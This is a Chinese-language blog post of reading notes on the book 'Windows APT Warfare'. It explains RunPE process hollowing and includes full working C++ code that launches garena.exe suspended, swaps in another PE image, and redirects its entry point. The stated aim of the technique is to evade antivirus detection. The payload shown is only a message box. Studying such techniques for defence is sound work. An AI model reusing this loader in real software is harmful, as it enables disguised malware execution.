<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>ch.2 初識RunPE | tenghaooo&#39;s blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="RunPE是指惡意程式先執行一個正常的process，然後將該process本來要執行的PE模組替換成惡意的模組，導致該process執行惡意程式指定的PE而非本來該process的PE，達到披著羊皮的狼的目的，逃過防毒軟體的偵測。 一個process可以掛載多個PE(ex. DLL)，也就是一個process的address space中可以映射進很多個PE，而當一個新的process要開始執行">
<meta property="og:type" content="article">
<meta property="og:title" content="ch.2 初識RunPE">
<meta property="og:url" content="https://tenghaooo.github.io/2022/01/20/APTWarfare-ch2-runpe/index.html">
<meta property="og:site_name" content="tenghaooo&#39;s blog">
<meta property="og:description" content="RunPE是指惡意程式先執行一個正常的process，然後將該process本來要執行的PE模組替換成惡意的模組，導致該process執行惡意程式指定的PE而非本來該process的PE，達到披著羊皮的狼的目的，逃過防毒軟體的偵測。 一個process可以掛載多個PE(ex. DLL)，也就是一個process的address space中可以映射進很多個PE，而當一個新的process要開始執行">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://tenghaooo.github.io/pics/runpe.gif">
<meta property="article:published_time" content="2022-01-20T14:09:57.000Z">
<meta property="article:modified_time" content="2022-04-14T11:22:37.708Z">
<meta property="article:author" content="tenghaooo">
<meta property="article:tag" content="runpe">
<meta property="article:tag" content="process injection">
<meta property="article:tag" content="process hollowing">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://tenghaooo.github.io/pics/runpe.gif">
  
    <link rel="alternate" href="/atom.xml" title="tenghaooo's blog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">tenghaooo&#39;s blog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
          <a class="main-nav-link" href="/whoami">Whoami</a>
        
          <a class="main-nav-link" href="/works">Works</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://tenghaooo.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-APTWarfare-ch2-runpe" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2022/01/20/APTWarfare-ch2-runpe/" class="article-date">
  <time class="dt-published" datetime="2022-01-20T14:09:57.000Z" itemprop="datePublished">2022-01-20</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E8%AE%80%E6%9B%B8%E7%AD%86%E8%A8%98/">讀書筆記</a>►<a class="article-category-link" href="/categories/%E8%AE%80%E6%9B%B8%E7%AD%86%E8%A8%98/Malware/">Malware</a>►<a class="article-category-link" href="/categories/%E8%AE%80%E6%9B%B8%E7%AD%86%E8%A8%98/Malware/Windows-APT-Warfare%E6%83%A1%E6%84%8F%E7%A8%8B%E5%BC%8F%E5%89%8D%E7%B7%9A%E6%88%B0%E8%A1%93%E6%8C%87%E5%8D%97/">Windows APT Warfare惡意程式前線戰術指南</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      ch.2 初識RunPE
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p>RunPE是指惡意程式先執行一個正常的process，然後將該process本來要執行的PE模組替換成惡意的模組，導致該process執行惡意程式指定的PE而非本來該process的PE，達到披著羊皮的狼的目的，逃過防毒軟體的偵測。</p>
<p>一個process可以掛載多個PE(ex. DLL)，也就是一個process的address space中可以映射進很多個PE，而當一個新的process要開始執行時，要如何知道執行哪一個PE的內容才對呢，答案就在PEB(Process Environment Block)中，PEB中的ImageBaseAddress會儲存要執行的程式映像基址，假設一個PE模組被映射到address space中的0xA00000，還有另一個PE模組被映射到0x400000，而如果PEB-&gt;ImageBaseAddress是0xA00000，就代表該PE是這支process將要執行的模組。</p>
<span id="more"></span>
<p>當Main Thread執行到NtDLL!LdrpInitializeProcess函數(此為「執行程式裝載器」，負責修正導入導出表及重定向等工作)時，會識別出主要執行模組為位在0xA00000的那個模組，便會以該模組進行修正工作，並在執行完後把執行權交棒給該PE模組的入口(嘿對就是該PE的AddressOfEntryPoint)，然後該PE的內容就會被執行。</p>
<p>這樣RunPE的思路就比較清晰了，假設本來有個process，其中有個A模組應該要被執行，但如果我可以在執行程式裝載器執行前，把一個B模組映射進該process的address space，而且把該process的PEB-&gt;ImageBaseAddress修改成B模組映射到的image基址，再把應該被交棒的入口改成B模組的AddressOfEntryPoint，那就可以劫持本來的流程，把B模組跑起來了。</p>
<p>CreateProcessA在建立新process時可以將其Suspend，此時Main Thread尚未執行到執行程式裝載器，且此時Main Thread的Context中，EIP會指向NtDLL!RtlUserThreadStart函數，該函數第一個參數會放在EAX，儲存著完成初始化後應該要被交棒的執行地址，第二個參數放在EBX，儲存的就是PEB的地址，而EBX+8這個地址存的就是PEB中的ImageBaseAddress。</p>
<p><a target="_blank" rel="noopener" href="https://gist.github.com/tenghaooo/aaed51c658e8a11186b963b64a7e3cc9">以下程式</a>runPE.exe會先檢查當前的模組名稱是不是garena.exe，是的話就彈一個窗口。如果不是的話，代表當前模組是runPE.exe，它會用CreateProcessA開啟garena.exe，這時候新的process模組名稱就會是garena.exe了，然後再把新process的模組替換成當前模組(runPE.exe)，這時候新process的模組名稱是garena.exe，但是實際執行的模組被替換了，所以當新的process執行時，會執行runPE.exe的內容，而runPE.exe會先檢查當前模組名稱是不是garena.exe，檢查是garena.exe，最後彈出一個窗口。</p>
<p><img src="https://tenghaooo.github.io/pics/runpe.gif" alt="runpe"></p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;Windows.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function">BYTE* <span class="title">MapFileToMemory</span><span class="params">(LPCSTR filename)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	FILE* fp;</span><br><span class="line">	<span class="keyword">errno_t</span> e = <span class="built_in">fopen_s</span>(&amp;fp, filename, <span class="string">&quot;rb&quot;</span>);  <span class="comment">// open file</span></span><br><span class="line">	<span class="built_in">fseek</span>(fp, <span class="number">0</span>, SEEK_END);  <span class="comment">// move to file end</span></span><br><span class="line">	LONG size = <span class="built_in">ftell</span>(fp);   <span class="comment">// get file size</span></span><br><span class="line">	<span class="built_in">fseek</span>(fp, <span class="number">0</span>, SEEK_SET);  <span class="comment">// move to file begin</span></span><br><span class="line"></span><br><span class="line">	BYTE* buffer = (BYTE*)<span class="built_in">malloc</span>(<span class="built_in"><span class="keyword">sizeof</span></span>(BYTE) * size);</span><br><span class="line">	<span class="built_in">fread</span>(buffer, size, <span class="number">1</span>, fp);  <span class="comment">// read file to buffer</span></span><br><span class="line"></span><br><span class="line">	<span class="built_in">fclose</span>(fp);</span><br><span class="line">	<span class="keyword">return</span> buffer;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// open an PE process then replace it with the image</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">RunPE</span><span class="params">(LPCSTR originPE, <span class="keyword">void</span>* Image)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	IMAGE_DOS_HEADER* DOSHeader;</span><br><span class="line">	IMAGE_NT_HEADERS* NtHeader;</span><br><span class="line">	IMAGE_SECTION_HEADER* SectionHeader;</span><br><span class="line"></span><br><span class="line">	PROCESS_INFORMATION PI = &#123;&#125;;</span><br><span class="line">	STARTUPINFOA SI = &#123;&#125;;</span><br><span class="line"></span><br><span class="line">	CONTEXT* CTX;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">size_t</span>* ImageBase;  <span class="comment">// base address of the image</span></span><br><span class="line">	<span class="keyword">void</span>* pImageBase;  <span class="comment">// pointer to the image base</span></span><br><span class="line"></span><br><span class="line">	DOSHeader = <span class="built_in">PIMAGE_DOS_HEADER</span>(Image);  <span class="comment">// initialize</span></span><br><span class="line">	NtHeader = <span class="built_in">PIMAGE_NT_HEADERS</span>((<span class="keyword">size_t</span>)Image + DOSHeader-&gt;e_lfanew);  <span class="comment">// initialize</span></span><br><span class="line">	SectionHeader = <span class="built_in">PIMAGE_SECTION_HEADER</span>((<span class="keyword">size_t</span>)NtHeader + <span class="built_in"><span class="keyword">sizeof</span></span>(*NtHeader));  <span class="comment">// initialize</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (NtHeader-&gt;Signature == IMAGE_NT_SIGNATURE)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="comment">// create an instance of originPE in suspended state</span></span><br><span class="line">		<span class="keyword">if</span> (<span class="built_in">CreateProcessA</span>(originPE, <span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>, FALSE, CREATE_SUSPENDED, <span class="literal">NULL</span>, <span class="literal">NULL</span>, &amp;SI, &amp;PI))</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="comment">// Allocate memory for the context.</span></span><br><span class="line">			CTX = <span class="built_in">LPCONTEXT</span>(<span class="built_in">VirtualAlloc</span>(<span class="literal">NULL</span>, <span class="built_in"><span class="keyword">sizeof</span></span>(CONTEXT), MEM_COMMIT, PAGE_READWRITE));</span><br><span class="line">			CTX-&gt;ContextFlags = CONTEXT_FULL; <span class="comment">// Context is allocated</span></span><br><span class="line"></span><br><span class="line">			<span class="keyword">if</span> (<span class="built_in">GetThreadContext</span>(PI.hThread, CTX))</span><br><span class="line">			&#123;</span><br><span class="line">				<span class="built_in">ReadProcessMemory</span>(PI.hProcess, <span class="built_in">LPCVOID</span>(CTX-&gt;Ebx + <span class="number">8</span>), <span class="built_in">LPVOID</span>(&amp;ImageBase), <span class="number">4</span>, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">				<span class="comment">// allocate an space from the new process for the Image, and the desired start address is the Image&#x27;s OptionalHeader.ImageBase</span></span><br><span class="line">				pImageBase = <span class="built_in">VirtualAllocEx</span>(PI.hProcess, <span class="built_in">LPVOID</span>(NtHeader-&gt;OptionalHeader.ImageBase), NtHeader-&gt;OptionalHeader.SizeOfImage, <span class="number">0x3000</span>, PAGE_EXECUTE_READWRITE);</span><br><span class="line"></span><br><span class="line">				<span class="comment">// write the Image headers to the space</span></span><br><span class="line">				<span class="built_in">WriteProcessMemory</span>(PI.hProcess, <span class="built_in">LPVOID</span>(pImageBase), Image, NtHeader-&gt;OptionalHeader.SizeOfHeaders, <span class="literal">NULL</span>);</span><br><span class="line">				<span class="comment">// write the Image sections to the space</span></span><br><span class="line">				<span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; NtHeader-&gt;FileHeader.NumberOfSections; i++) &#123;</span><br><span class="line"></span><br><span class="line">					<span class="built_in">WriteProcessMemory</span>(PI.hProcess,</span><br><span class="line">						<span class="built_in">LPVOID</span>(<span class="built_in">size_t</span>(pImageBase) + SectionHeader[i].VirtualAddress),</span><br><span class="line">						<span class="built_in">LPVOID</span>(<span class="built_in">size_t</span>(Image) + SectionHeader[i].PointerToRawData),</span><br><span class="line">						SectionHeader[i].SizeOfRawData, <span class="number">0</span>);</span><br><span class="line">				&#125;</span><br><span class="line"></span><br><span class="line">				<span class="comment">// PEB-&gt;ImageBaseAddress is pointed by CTX-&gt;Ebx + 8</span></span><br><span class="line">				<span class="comment">// replace the value of (CTX-&gt;Ebx + 8) to pImageBase, so the PE module at pImageBase will be executed</span></span><br><span class="line">				<span class="built_in">WriteProcessMemory</span>(PI.hProcess, <span class="built_in">LPVOID</span>(CTX-&gt;Ebx + <span class="number">8</span>), <span class="built_in">LPVOID</span>(&amp;pImageBase), <span class="number">4</span>, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">				<span class="comment">// modify the entry point address, which is pointed by CTX-&gt;Eax</span></span><br><span class="line">				CTX-&gt;Eax = <span class="built_in">DWORD</span>(pImageBase) + NtHeader-&gt;OptionalHeader.AddressOfEntryPoint;</span><br><span class="line">				<span class="built_in">SetThreadContext</span>(PI.hThread, <span class="built_in">LPCONTEXT</span>(CTX));</span><br><span class="line"></span><br><span class="line">				<span class="built_in">ResumeThread</span>(PI.hThread);</span><br><span class="line"></span><br><span class="line">				</span><br><span class="line">				<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> CALLBACK <span class="title">WinMain</span><span class="params">(HINSTANCE, HINSTANCE, LPSTR, <span class="keyword">int</span>)</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">char</span> CurrentFilePath[MAX_PATH + <span class="number">1</span>];</span><br><span class="line">	<span class="built_in">GetModuleFileNameA</span>(<span class="number">0</span>, CurrentFilePath, MAX_PATH);</span><br><span class="line">	</span><br><span class="line">	<span class="comment">// current module is gerena? </span></span><br><span class="line">	<span class="keyword">if</span> (<span class="built_in">strstr</span>(CurrentFilePath, <span class="string">&quot;C:\\Program Files (x86)\\Garena\\Garena\\garena.exe&quot;</span>)) &#123;</span><br><span class="line">		<span class="built_in">MessageBoxA</span>(<span class="number">0</span>, <span class="string">&quot;process hollowing!!&quot;</span>, <span class="string">&quot;RunPE&quot;</span>, <span class="number">0</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	LPCSTR origin = <span class="string">&quot;C:\\Program Files (x86)\\Garena\\Garena\\garena.exe&quot;</span>;</span><br><span class="line">	<span class="built_in">RunPE</span>(origin, <span class="built_in">MapFileToMemory</span>(CurrentFilePath));</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>





<p>參考連結<br><a target="_blank" rel="noopener" href="https://github.com/aaaddress1/Windows-APT-Warfare/blob/main/source/chapter%2302/RunPE/RunPE.cpp">https://github.com/aaaddress1/Windows-APT-Warfare/blob/main/source/chapter%2302/RunPE/RunPE.cpp</a><br><a target="_blank" rel="noopener" href="https://github.com/Zer0Mem0ry/RunPE/blob/master/RunPE.cpp">https://github.com/Zer0Mem0ry/RunPE/blob/master/RunPE.cpp</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://tenghaooo.github.io/2022/01/20/APTWarfare-ch2-runpe/" data-id="cl291zmjq0001gktvdz9w8be8" data-title="ch.2 初識RunPE" class="article-share-link">Share</a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/process-hollowing/" rel="tag">process hollowing</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/process-injection/" rel="tag">process injection</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/runpe/" rel="tag">runpe</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/01/24/OSTEP-ch18-paging/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          ch.18 paging
        
      </div>
    </a>
  
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AE%80%E6%9B%B8%E7%AD%86%E8%A8%98/">讀書筆記</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AE%80%E6%9B%B8%E7%AD%86%E8%A8%98/Malware/">Malware</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AE%80%E6%9B%B8%E7%AD%86%E8%A8%98/Malware/Windows-APT-Warfare%E6%83%A1%E6%84%8F%E7%A8%8B%E5%BC%8F%E5%89%8D%E7%B7%9A%E6%88%B0%E8%A1%93%E6%8C%87%E5%8D%97/">Windows APT Warfare惡意程式前線戰術指南</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AE%80%E6%9B%B8%E7%AD%86%E8%A8%98/Operating-System/">Operating System</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%AE%80%E6%9B%B8%E7%AD%86%E8%A8%98/Operating-System/Operating-Systems-Three-Easy-Pieces/">Operating Systems: Three Easy Pieces</a></li></ul></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9B%B6%E7%A2%8E%E7%9F%A5%E8%AD%98/">零碎知識</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/03/10/APTWarfare-ch3-TEB%20&%20PEB/">ch.3 TEB &amp; PEB</a>
          </li>
        
          <li>
            <a href="/2022/03/09/Other-fd/">file descriptor</a>
          </li>
        
          <li>
            <a href="/2022/01/24/OSTEP-ch18-paging/">ch.18 paging</a>
          </li>
        
          <li>
            <a href="/2022/01/20/APTWarfare-ch2-runpe/">ch.2 初識RunPE</a>
          </li>
        
      </ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/PEB/" style="font-size: 10px;">PEB</a> <a href="/tags/TEB/" style="font-size: 10px;">TEB</a> <a href="/tags/calling-convention/" style="font-size: 10px;">calling convention</a> <a href="/tags/fd/" style="font-size: 10px;">fd</a> <a href="/tags/process-hollowing/" style="font-size: 10px;">process hollowing</a> <a href="/tags/process-injection/" style="font-size: 10px;">process injection</a> <a href="/tags/runpe/" style="font-size: 10px;">runpe</a>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 tenghaooo<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
    <a href="/whoami" class="mobile-nav-link">Whoami</a>
  
    <a href="/works" class="mobile-nav-link">Works</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>